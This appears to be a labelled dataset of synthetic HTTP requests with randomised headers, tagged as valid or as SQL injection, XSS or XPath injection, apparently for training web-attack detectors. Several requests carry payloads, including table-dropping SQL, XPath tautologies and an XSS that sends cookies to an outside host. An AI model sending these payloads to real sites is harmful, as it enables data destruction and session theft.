Warning: 429 245.130.187.92 "yektIqaee5r3rxhg" "Tue, 26 Jun 07 17:05:12 GMT"
X-Forwarded-For: 162.29.213.245
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1777
Start - Id: 13109
class: Valid
GET /ou/chTPm-/aoTstrtdi5sgelveuPee/8aa0hoadPrrio0/vse6y/rbExeesoosrcinTaugts/opt6@txtermlcmd.png? HTTP/1.1
Host: www.shTfO8to.fr:9
Connection: rOeT
Accept: */*;q=0.6
Accept-Charset: iso-8859-8;q=0.0, iso-8859-8, windows-1257;q=0.9
Accept-Encoding: identity, gzip
Accept-Language: ae0rqg-eceOs, edOcgd-iMvA;q=0.5, nTlzldd6-er;q=0.9
Cache-Control: max-stale
Client-ip: 205.66.41.114
Cookie: aei3mre3=nT8maktrO4thnat2hi;nfuedt=eEssrFh95S;eehhio=eye m
Cookie2: $Version="38"
Date: Sun, 24 Jun 07 15:08:29 UTC
ETag: W/"SRb2aCAxGYdujK7JISq"
Expect: 100-continue
From: uth2onre@imezhnI.biz
If-Modified-Since: Wed, 26 Oct 05 09:05:46 UTC
If-Unmodified-Since: Wed, 28 Jan 09 08:55:55 UTC
If-Match: "ZbXkx4dWzzXUxVpJ6uUF"
If-None-Match: *
If-Range: Fri, 13 Jan 06 24:38:45 UTC
Max-Forwards: 9338
MIME-Version: 1.1
Pragma: 4loehs='u0ecua'
Proxy-Authorization: NTLM dWdyb2xkYWZuaW5oaGNzdGNueHlpMnRUbGI2ZWJlanRlMW80YW9iaXJvYWN0ZGVl
Authorization: Basic dWVuYW86YWFhc3pkZQ==
Range: -7936
Referer: http://www.ah6Aey.fr/icOd/atgiuem/nh8SYoo/3noe/oaouera.gif
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.1 (Windows; U; Win98 4.5; qh-n6; rv:2.6.7) Gecko/35203508
UA-CPU: Sparc
UA-Disp: 160,1655,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 824x5832
Via: soet/3.6 130.238.96.214, eNdaH/9.1 31.158.216.232
Transfer-Encoding: identity
Upgrade: rddiP/8.7
Warning: 376 211.106.118.186 "rssg" 
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 74451528959
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13109
Start - Id: 9795
class: Valid
GET /oqti/tg99Wf631MAZBQbg/O9dWcatmZ.selectrcpwEWj/metaD-sock_streamDQY.NK4Jwa/n5agZPlLvJjwxEaXobR.cgi?onn3fa=scii&0Vyinputqd=a-rf HTTP/1.1
Host: 82.126.117.116
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=638
Client-ip: 142.252.165.176
Cookie: NMvCzM=memsceFeeHEh;kAshttpJSpps=enB@T.RJvZ;ufnnhugl=avfw
Cookie2: $Version="74"
Date: Fri, 12 Jun 09 05:22:18 CET
ETag: "9QcqDrRniCsHj9Thro7"
Expect: i0hpyeh
From: frwpr@Te9h.be
If-Modified-Since: Sun, 26 Feb 06 15:18:57 UTC
If-Unmodified-Since: Mon, 24 Oct 05 21:22:53 UTC
If-Match: *
If-None-Match: "oK5OYHj-MprphiCd3Ppi"
If-Range: Wed, 30 Apr 08 04:23:30 CET
Max-Forwards: 4569
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: IsiUr 6twklat=tyei
Authorization: Digest username="ulihe"
Range: 32-
Referer: /uowDkwRc/roe04/ostt.msf
TE: chunked,trailers
Trailer: Trailer
User-Agent: Mozilla/2.5 (X11; U; Open BSD i586 5.1; ie-zh; rv:1.5.4) Gecko/33046289
UA-CPU: PowerPC
UA-Disp: 152,310,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3832x6503
Via: HTTP/5.5 www.axamp.tiff, 5.4 24.228.124.196
Transfer-Encoding: identity
Upgrade: jaeNfe/6.3, eitr/9.7, Eia/7.9, ryge/4.3
Warning: 928 www.ocTt.htm:04221 "zlt2ebnora" 
X-Forwarded-For: 215.67.208.226
X-Serial-Number: 3012101828224515543
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9795
Start - Id: 30808
class: Valid
GET /eIJ7jI/est3aFnYyldDnouNTu/xstyleKEY_KT@fEzU/nX6xvOdh@vFBZLlf@a2.php4?wioOeideoodlrde=2229&en3teliq2ein=1235&yIHvc3qHk=5699&7rEmMetm6o2DtgE=bZrY7Isu_m9&mrf0dtfadesdd7=pizmotiaT9ktidxaft&tlrEoe1dunG=chckog6doae&oeeel=eFniGetRsout8clj&o-auKGDQK@P=ee+s0lxscriptsdCtmibgsoundec%3At%28&ntelnetZ6Vs=rLD&iolfxwTctq=3l+sREycservicesoe&yp8m=cQaEt%40VyW453 HTTP/1.1
Host: www.u7tet.biz
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: e0=nw
Client-ip: 178.10.52.48
Cookie: eoTyzEe=yxr4~;logL2Pc8s=HbdHp3f1betnetsb;sBselcEa=cUw6pmcn6wrxro
Cookie2: $Version="006"
Date: Sat, 05 Jan 08 14:58:01 UTC
ETag: W/"HEDIY.6Wp0hf@NT"
Expect: r9dd=zetdsrcn
From: eauh@chhrgB5dy.biz
If-Modified-Since: Sun, 14 Mar 04 20:56:40 GMT
If-Unmodified-Since: Tue, 07 Apr 09 05:30:32 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8941
MIME-Version: 8.9
Pragma: pnih='ahser'
Proxy-Authorization: Basic YVNlYnNjYWc6YXROSTU=
Authorization: Basic aTJhbjo4ZWxzZW9hSw==
Range: 40-,5809-053,-843
Referer: /Ie7u/a6a2c/IslA5e2/ac5em/rgne.cfm
TE: trailers,trailers
Trailer: Authorization
User-Agent: tsx.KvhQ http://www.ohiennz.it
UA-CPU: PowerPC
UA-Disp: 384,8584,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 450x916
Via: FTP/4.6 www.tuuse9n.jpeg, oor/3.4 www.Edsstn.js, FTP/3.1 www.etdlyofw.jpeg
Transfer-Encoding: yaIn; irIPr9be=ahcbR9
Upgrade: q15f/6.4, ouaiqo/0.5, r3a/6.5
Warning: 732 112.144.58.134 "HhNnuq" 
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 277433290484890410
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 30808
Start - Id: 41889
class: SqlInjection
GET /srO/roQCc9FvATqu9aM9yDM/Mo2yheiiraicse/tpg1oanDpsqe4ihse/sN@178.T/usF.Qi4VX/axDIIQ2H/Giouocsxieaa/uG0finvF.A..fCaZKjP/5DH_4orDXvvl/a3e9fnitddeuoadMls8e.jpg?aGuvbscriptH=uAMKSsQL3M&jTsrwae8=%27%3B++drop+table++htmiuuas&pD9ohaving=eagnl&FservicesjsH48EMl.=gFgDl2w1&pv=YNd&4t7HbgsoundW8=6654678 HTTP/1.0
Host: 239.60.101.200
Connection: keep-alive
Accept: video/quicktime;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 143.204.36.23
Cookie: gnavser5=rR;GIUe=4951;ncti8zltb=t;Cerro8=sosTs7sx:jn7qro0a4
Cookie2: $Version="03"
Date: Fri, 04 May 07 08:50:53 GMT
ETag: "gPXWXCyV9O4k_0w1BPB"
Expect: tRes=eraidrt;9eka
From: elee@hieitj.de
If-Modified-Since: Fri, 27 Nov 09 22:45:25 UTC
If-Unmodified-Since: Wed, 30 Jul 08 07:56:49 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 608
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: itfq bn7bnxr=jeUlmesd
Authorization: NTLM bXNlYnNwYWZvZXRhZnN6bmE1RW9IcmNEZGlvdG9sSGRhb2VpbXNoYWFFdG5zNzJ0
Range: 2764-93323,17883-91
Referer: /ogtex/henfiL/atet/eufhds.sh
TE: chunked;q=0.5
Trailer: Cache-Control
User-Agent: mepdice/7.6.0
UA-CPU: PowerPC
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 044x365
Via: 0.8 www.tehlel.htm, FTP/3.1 111.99.235.201
Transfer-Encoding: deflate
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 181 www.e4hach.tiff:99487 "eyten3eElsgEginsaoi" "Sun, 29 Feb 04 08:39:55 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41889
Start - Id: 42652
class: SqlInjection
GET /yeordrAoiTqoca/yObIk0QEkrIDNH/icTznnqt6lhsledtx/nTE/eh5p-8Vs/ed/ShdocumentLa9/sewInvies8e/viZgamoeny.cgi?oa4ehSemi=6233&krod0=mvJglNXH&7geuur=l%3Ahg+Iswgeer&eDi=%27%3B+++insert+++into+++atn++values%28666%2C%27cc0ntef%27%2C%27nnIeFhd8%27%2C0xfffff%29&ueuDiiTsrsieh=8347664&JZ0NHp3I1=9891&inull@F70=eg HTTP/1.0
Host: 248.164.67.34
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=339
Client-ip: 183.138.44.237
Cookie: ceeo4=803
Cookie2: $Version="2"
Date: Sat, 17 Feb 07 22:42:56 GMT
ETag: W/"d99n_-k.LjOX0-pI"
Expect: 100-continue
From: ioetrdEh@laes.com
If-Modified-Since: Mon, 30 Nov 09 18:31:36 GMT
If-Unmodified-Since: Sun, 14 Aug 05 21:30:20 GMT
If-Match: "zWpEPr0HNE-1IyB"
If-None-Match: *
If-Range: "IEn8juBMUOS2xQRK"
Max-Forwards: 4
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: NTLM dGRhNGVodG1hc2UyQXhuZWhndGtlb3l3MTN0ZXNyY2VkZQ==
Range: -5
Referer: http://www.hmirneg.be/7olt6t.php3
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.1 (Windows; U; Win 9x 0.6; ee-ow; rv:0.8.3) Gecko/89563328
UA-CPU: PowerPC
UA-Disp: 0660,7144,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: HTTP/4.6 www.tdmz.tiff, 7.2 www.1yntgg.png, FTP/2.8 www.d7rtnh.htm
Transfer-Encoding: compress
Upgrade: tehfc/4.6, Ehs/2.9, ereo/5.2
Warning: 589 203.56.73.253 "n545" 
X-Forwarded-For: 153.138.91.160
X-Serial-Number: 70889166788421985520
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42652
Start - Id: 46805
class: XSS
POST /aX5DL2iW.cK-ljZhQ0ez/petbs2tuogntnt.gif? HTTP/1.1
Content-Length: 172
Content-Language: ashemera,4ar
Content-Encoding: identity
Content-Location: /oqntMO.sh
Content-MD5: bGV1YXllcWhuanJhaXg0bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Jul 07 02:05:24 GMT
Last-Modified: Mon, 07 Jan 08 21:38:21 UTC
Host: 81.130.35.136:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 163.182.220.152
Cookie: samopenls6Kbinzi=vHueqLhT;Raetkice=e-7fGi;it6e=n1s4ubll
Cookie2: $Version="3"
Date: Wed, 30 Sep 09 19:50:56 UTC
ETag: "zdWaUN_28hOSe2q66Mv"
Expect: crttsci=ei2cr
From: he2rmeQu@ialstesjs.st
If-Modified-Since: Thu, 26 Apr 07 05:26:55 UTC
If-Unmodified-Since: Wed, 01 Feb 06 19:54:53 UTC
If-Match: "yCAS1H9xhaTvrLyDOYnr"
If-None-Match: *
If-Range: Mon, 30 Oct 06 24:51:56 UTC
Max-Forwards: 8
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: oand kioW=rs9ay
Authorization: pHir errlaW5a=wzth
Range: 15-86
Referer: /tonnGa/ttdv4gno/iihacn.txt
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: l0sCQE http://www.nqdr3.net
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 2.5 64.74.41.231, FTP/3.7 www.erecoa.htm, coli/5.6 185.118.118.60
Transfer-Encoding: nhPr; u3bs2aRe=daOe
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 254.13.104.181
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a6ynlAnttfas=d%3&stteyot3=na&ceranx=<img     src=   "     le     "onmouseover =    "[alert   ('mlenNt6l');]   "   >&hohee1vehtEhlva=29616134

End - Id: 46805
Start - Id: 48566
class: XPathInjection
POST /otXNYw/g3bHMBUImOJIJBiIEOF/usi2/g6qXH@lG.jpg? HTTP/1.1
Content-Length: 155
Content-Language: etez,eotedh,ufsda
Content-Encoding: gzip
Content-Location: /titUdA/tmixos/iA5nlt/sqsine.cfm
Content-MD5: cG82NURzeWdseTRyVG9icw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jan 09 14:19:42 GMT
Last-Modified: Sun, 22 May 05 04:47:32 GMT
Host: 112.77.177.248
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: nsIs-rwca
Cache-Control: max-stale
Client-ip: 5.57.77.191
Cookie: it=]m;7tztTaDn=4;atno5o=r/e;eq=6;maieaioZ=znOp;tsl=ecwmf
Cookie2: $Version="071"
Date: Thu, 12 Nov 09 14:36:04 CET
ETag: W/".NpEoPMJ922d-Z-plN"
Expect: Sqiorccr=plsduge
From: w3nw@eoeld2.be
If-Modified-Since: Tue, 04 Aug 09 05:48:08 GMT
If-Unmodified-Since: Sun, 20 Jun 04 22:14:19 CET
If-Match: "0p6whxnO@F7KRjR"
If-None-Match: "uR5RYQlVWfXpJdk"
If-Range: Thu, 13 Nov 08 13:14:49 GMT
Max-Forwards: 7167
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: siue bdclebse=ssaui
Authorization: Basic YUVzSTdvOmdlc2lzRW1h
Range: -99
Referer: /arerion/ovthwmhf.gif
TE: chunked;q=0.7
Trailer: Date
User-Agent: Mozilla/2.3 (Machintosh; U; PPC Mac OS X 3.4; rw-sr; rv:3.8.3) Gecko/76170713
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0026x0337
Via: 6.6 www.AdPuexei.jpeg
Transfer-Encoding: nhRze
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 651 www.filmtc.css "8HFtmshdumhqpyai" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

echoWNcD49=fBislai' or 1<  0/e/MeytT/child::text()[position()=24]   or 'efiDyse'  ='&RGdLRm3XfpV=vmRsU&tri8lOgss=ccewyi

End - Id: 48566
Start - Id: 50059
class: XPathInjection
POST /1FbP.r4mIC7zPB-knLa/ai711tdn/hdeacajA7wahew/aexfs9herecebn6atto/eN8B@FsVZIZ/0AsG8F_/usrB_6j0sam5GyA_/p-6C01O7SDSH0ePFGR5.gif? HTTP/1.1
Content-Length: 117
Content-Language: x4hhven,i
Content-Encoding: gzip
Content-Location: http://www.iifh.uk/aQae/s4tgtlc.gif
Content-MD5: ZnNldW90dVJsRWx1aHBhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Dec 08 22:33:53 UTC
Last-Modified: Sun, 22 Jul 07 01:28:11 GMT
Host: 119.66.221.0:057
Connection: close
Accept: application/zip, audio/*;q=0.4
Accept-Charset: iso-2022-jp;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 66.103.242.187
Cookie: rvI=9969609;acolaT=e(liD;aowriQw5iy=ermfn rcpcpdo@/ ;A;lwasc=one3en/Mnpie/1dan/child::node()[position()=931]   or   'nelc'  = ';gatCethenfnha=45309
Cookie2: $Version="188"
Date: Sat, 02 Oct 04 08:42:38 UTC
ETag: W/"1@69SC6OhsctPUz"
Expect: iOndest=nso3
From: tndo@hOino.uk
If-Modified-Since: Tue, 13 Nov 07 05:29:20 GMT
If-Unmodified-Since: Sat, 10 Jan 04 14:04:08 CET
If-Match: "eI4jBQPRlAOyNVfE"
If-None-Match: *
If-Range: Wed, 28 Feb 07 13:24:06 CET
Max-Forwards: 9
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic ZWVpZmluYTpybnJydDJlbw==
Authorization: Basic cGVhdU11OjNydGg=
Range: 68-,-66180,-89
Referer: /henF/luRa/1oUv7IEe/9aYfNDt.cfm
TE: chunked;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: beH4fTnystllfnd3aaeB
UA-CPU: MIPS
UA-Disp: 086,0919,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3705x532
Via: HTTP/2.8 www.mfsaruep.gif, FTP/7.8 www.ab59slc5.js, chwonn/7.2 173.248.182.197
Transfer-Encoding: identity
Upgrade: seeim/7.5, eeEad/9.1, noaakN/7.4, uat/4.4, Shme/3.3
Warning: 633 118.107.47.29 "ehmrqron" "Sun, 16 Apr 06 02:34:14 GMT"
X-Forwarded-For: 78.250.5.71
X-Serial-Number: 34243313236496
----: ---------------------------
~~~~~: ~~~~~~~~~~~

ZR0zQWRBinclude=9UBmltQ5&ai=475&nop7hs07exo7a=p&epDgucnQtSl=43&8Umwrj=28607&Soms=ttCwot &k0YZBR=seavyrg2htite&he=5848

End - Id: 50059
Start - Id: 23947
class: Valid
GET /pm26oeioxwoLt/tV1tr7X/shidrl8iardranuc/eentnrnbra3opm/beahloukhM/aasetxssdNb7.exe?7se3=ldnen&haiynttgbo=5618110&1feai=%24h&rmtsa2a=60619277&Ebmyehso=a6toMzx8iP&s8meu0dw=2&scgasmmet67i=+az%2Bwanhwinnto&v@bUkQBsam=r_X58vc&4si6ldn=2730188627&yid7jhpxsstt=69180233&Rx_RLadminXpPc@=eRj&ghx3ads5ntst=hY5&Tdtmanliiasac=a3I0shd&siwiwuhgdneubN=Anttiet+asorot&oe=%26n8vshtsa2iy HTTP/1.0
Host: www.rad7R.ch
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-age=06
Client-ip: 237.51.196.149
Cookie: sd8ejpqestte=E4atetloptet=ef;oAdlfIciov=tst;sh1ynftsh=mAtuabEerihtanimes;kntlhrn1nio=bkMTVVy;41ey3=WjtlhR;ci4rh=7703174
Cookie2: $Version="843"
Date: Tue, 03 Apr 07 02:06:57 GMT
ETag: W/"FvkHj8C9bQkH4Xda@"
Expect: 100-continue
From: irliyiyI@8ciiyp.be
If-Modified-Since: Tue, 14 Jun 05 06:56:44 GMT
If-Unmodified-Since: Thu, 17 Dec 09 20:11:34 GMT
If-Match: "-iPs0KQwYGxUvoD3UP"
If-None-Match: *
If-Range: Sun, 28 Mar 10 21:40:28 UTC
Max-Forwards: 39
MIME-Version: 9.0
Pragma: 9='t8awt0'
Proxy-Authorization: Basic YU1FZmRpZTpiaWVhcnM=
Authorization: Digest cnonce="oqlzc"
Range: 074-7647,9-,-3
Referer: http://ol0chlT.uk/Spny/teEsMtQw/SurePaa.tar
TE: deflate
Trailer: Accept-Encoding
User-Agent: ddtaq/0.3.6.2.4
UA-CPU: StrongARM
UA-Disp: 7033,058,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 916x209
Via: 3.2 120.118.25.127
Transfer-Encoding: gzip
Upgrade: aehr/3.4, ioW/9.5
Warning: 790 171.116.173.213 "hopsown6nqcIceI3A" "Sat, 01 Oct 05 02:13:23 CET"
X-Forwarded-For: 16.106.202.140
X-Serial-Number: 149109156633944
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23947
Start - Id: 26244
class: Valid
GET /duhHaU2Qu01/bv8@LiqvPY-OmV.php?AqRoontE=esdcatpea&at=Yaysevald+rsgoec+ua&McmeumCtscim33I=4344 HTTP/1.1
Host: www.eaece.be:4
Connection: close
Accept: video/*
Accept-Charset: iso-8859-9;q=0.9
Accept-Encoding: deflate
Accept-Language: g2x-eenddie;q=0.4, yroh-3S;q=0.2, iIls3aT9-jPi;q=0.4
Cache-Control: no-store
Client-ip: 231.19.139.185
Cookie: EsT9BBV1=7;8nhs9srr=t1eesslcsc
Cookie2: $Version="197"
Date: Wed, 20 Jan 10 02:22:14 UTC
ETag: "uY@7YsUiuiWdr_jCL"
Expect: 100-continue
From: scire@l29NotOrdn.be
If-Modified-Since: Sat, 23 May 09 19:27:05 GMT
If-Unmodified-Since: Sat, 11 Oct 08 20:24:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://ismiws.org/bltnhue/eeeeezo.gif
Authorization: NTLM aDVub250SHd0amZiY2hkdHRpbG9lbGFhbG5zY2lwZHVlaGVmdWE1dHh0YnRh
Range: 47781-
Referer: http://www.nteSoo.gov/Asee/sghid/aiIsHDh.wav
TE: trailers,gzip;q=0.6
Trailer: Connection
User-Agent: Mozilla/7.6 (Machintosh; U; Mac OS X 5.2; il-nm; rv:1.7.4) Gecko/53975197
UA-CPU: MIPS
UA-Disp: 9474,169,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 857x6835
Via: FTP/4.6 www.rh23dita.html, oo8d/7.6 149.81.76.203:60636
Transfer-Encoding: identity
Upgrade: geoaa/5.5, tnh/2.0, wawlno/4.1
Warning: 011 225.32.78.230 "otaEld4eerueo" "Sat, 17 Feb 07 07:52:31 CET"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 4037485153
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26244
Start - Id: 15822
class: Valid
GET /mh_aJXCiyh1M@3E1P/sNqSk1n/tRKiOLaaJxT/fDADOCqz5tipN1/sosswe/tug@eWO8/1yiTreosbneidtegmOc/6H_4PO9rXWz4/IKmQqtievalM@3/Bu9Ql3WKnpTe/mso/tcTqB--zk0F.png?BXdUlHgTEJ=549363102&o1cGmTYz-7=%7EU8heTgtrBqi&ra15=4487111669&ieeOiotaqav=hBqqp&ide=i5iq1&ASrFxrj=eVRjmUMFbIU7&eesoto=5&m2ehreeebi=wskLgomixp_Dtr9iaoew+delete&JwWOttcid=1227484&ysstbn8g=nlH1llihe6lcsak&_gYd5OdinsertS_ou=21&eicotwtttt=aoV&eto=rqx0xg&ihd4dehsn=stlmu54e&aele8liSg=ci5s HTTP/1.0
Host: 130.27.170.67
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: macintosh
Accept-Encoding: 
Accept-Language: nof7ttuI-iIn9, gaEt13h-e;q=0.2
Cache-Control: no-cache
Client-ip: 97.141.13.193
Cookie: litathLdtl7spil=aaemsabifhsoni;nm=2;bue3gnrqMitidse=t4raluftsied;sznsma=o eBsptolA2%;7Eaovmvd6csmrp=7are3tfSttviJt;tVWWlike4xidJ=h33F_U
Cookie2: $Version="7"
Date: Sat, 17 Mar 07 05:38:19 CET
ETag: "SrG7b_onwu-VOS-mmV1m"
Expect: 100-continue
From: nsmr@ahaei.uk
If-Modified-Since: Mon, 16 Feb 09 14:51:48 GMT
If-Unmodified-Since: Mon, 02 Nov 09 05:25:26 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Oct 08 02:38:01 GMT
Max-Forwards: 69
MIME-Version: 6.0
Pragma: ft5l=g
Proxy-Authorization: Digest username="0nSl"
Authorization: ttssWe pnweEo=obouots
Range: -63889,815-78,-958
Referer: /opse.txt
TE: gzip;q=0.2,deflate
Trailer: Max-Forwards
User-Agent: Mozilla/5.1 (compatible; MSIE 3.3; Solaris; Hiit; edhl9qrun)
UA-CPU: 68000
UA-Disp: 3222,4414,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 132x8371
Via: FTP/8.3 78.33.84.232
Transfer-Encoding: compress
Upgrade: tnsap/4.9, hb3i/7.3, teoa/7.0, yetn/8.3, dof/3.7
Warning: 193 www.losl.png "jmxogwrexo6" 
X-Forwarded-For: 10.118.64.124
X-Serial-Number: 6066558353005235
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15822
Start - Id: 22085
class: Valid
GET /uSLhpWKpb_Da/e4r0oAYc.9ORaG/ausd/la/hln.jpeg?bSrejegrarsrto=259414 HTTP/1.1
Host: 9.203.191.18:80
Connection: 7lzl
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic, cp-936;q=0.2, windows-1257, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 254.185.162.134
Cookie: V0I=ar
Cookie2: $Version="55"
Date: Tue, 07 Feb 06 20:48:54 CET
ETag: W/"SanrXoCzHmw5UWujzl_o"
Expect: 100-continue
From: kdhjpy@6iewo7.st
If-Modified-Since: Sun, 09 Sep 07 15:06:03 UTC
If-Unmodified-Since: Mon, 27 Feb 06 03:53:03 UTC
If-Match: "kMGnVj8F64HFzDPWha0"
If-None-Match: "L.d0alPEdurZA.sDhU"
If-Range: "GBXvhcc_GHA@iSiO"
Max-Forwards: 36
MIME-Version: 1.8
Pragma: jtdarli=t
Proxy-Authorization: NTLM b2VMemlwc2hIMndzdGM1dGRlZWFIMTV1ZG85OGxlZm9yaQ==
Authorization: NTLM a21xbWxSb2gybTl1bzBybjN5dGVsZGM3YXJEdWxtaHVRY2NkYg==
Range: -774
Referer: /nib472/thkdwbNo/Erho2d.html
TE: trailers,trailers,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/9.2 (Windows; U; WinNT 4.4; et-ht; rv:0.6.2) Gecko/19736419
UA-CPU: StrongARM
UA-Disp: 7235,8490,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 052x8055
Via: FTP/9.8 19.199.55.69
Transfer-Encoding: 4iei9; empuhe=Nh2s4y
Upgrade: ireEu/5.5
Warning: 503 www.atcO.png "aniinsIheewgiof" 
X-Forwarded-For: 223.155.250.69
X-Serial-Number: 42920569636252963929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 22085
Start - Id: 46977
class: XSS
GET /iiterNiitbtgts9bNo/rcevaaOe50ho.bin?TtkEHpNunionxo0f=CittOmneno&hydhrke=tauu&naoS=hhfvbR&rrdsec7aE2y=oA%27-siOStyui%2B%3E9otps&ys=formstgi%3Brfromen&e5hwpfd=642762&lly=497776772&4I-y@optfs=008015&I2iCN=%3Cxml+++++src+%3D%22+++++javascript%3A+++%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.chderaic.com%2Fcgi-bin%2Fne.cgi%27%2Bdocument.cookie%29%3B%5D%22++%3E HTTP/1.1
Host: www.9ttedit.de
Connection: close
Accept: application/postscript
Accept-Charset: windows-1250;q=0.7, windows-1251, iso-10646-ucs-2, x-mac-roman, cp-950;q=0.0
Accept-Encoding: identity;q=0.1, compress;q=0.0
Accept-Language: pq-0thu, eldu1D-Hon1EwE;q=0.1, a-crphqN6;q=0.7, hnccien-uaeIo
Cache-Control: tdi='Oarhure'
Client-ip: 176.68.160.126
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Fri, 27 Feb 09 23:30:48 UTC
ETag: W/"1RB7F6M.D6iD7VDJ1x"
Expect: lirmAu=bfd2
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Fri, 11 Apr 08 11:49:33 GMT
If-Unmodified-Since: Sun, 25 Nov 07 04:58:07 CET
If-Match: "ez9rQfT_vaCsyUB"
If-None-Match: *
If-Range: Fri, 23 Jul 04 10:17:27 CET
Max-Forwards: 3
MIME-Version: 0.1
Pragma: id=1ytd
Proxy-Authorization: NTLM dERkdGN0N2RobWhKb2VoY2M1dXJ1ZWlpaXNXenVuYTZoMGM=
Authorization: NTLM cnRkc2xvb3dwZHJqNXJlb3RlczJvd3BvdGRzbm5ncHZhc1RhdWFm
Range: -299,87-,670-62
Referer: /vompti5c/i2a65hh/oahu/ir2e.jpg
TE: deflate
User-Agent: Mozilla/7.5 (compatible; Konqueror/9.3; Linux i386; ynyun)
UA-Disp: 2976,173,32
UA-Pixels: 199x2885
Via: FTP/6.1 10.144.201.252, ve38li/3.2 www.besdtn.tiff
Transfer-Encoding: compress
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 973 www.oeahty.js "metfxElbimtcoqd5lot" 
X-Forwarded-For: 174.206.213.130
X-Serial-Number: 09560109
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46977
Start - Id: 10573
class: Valid
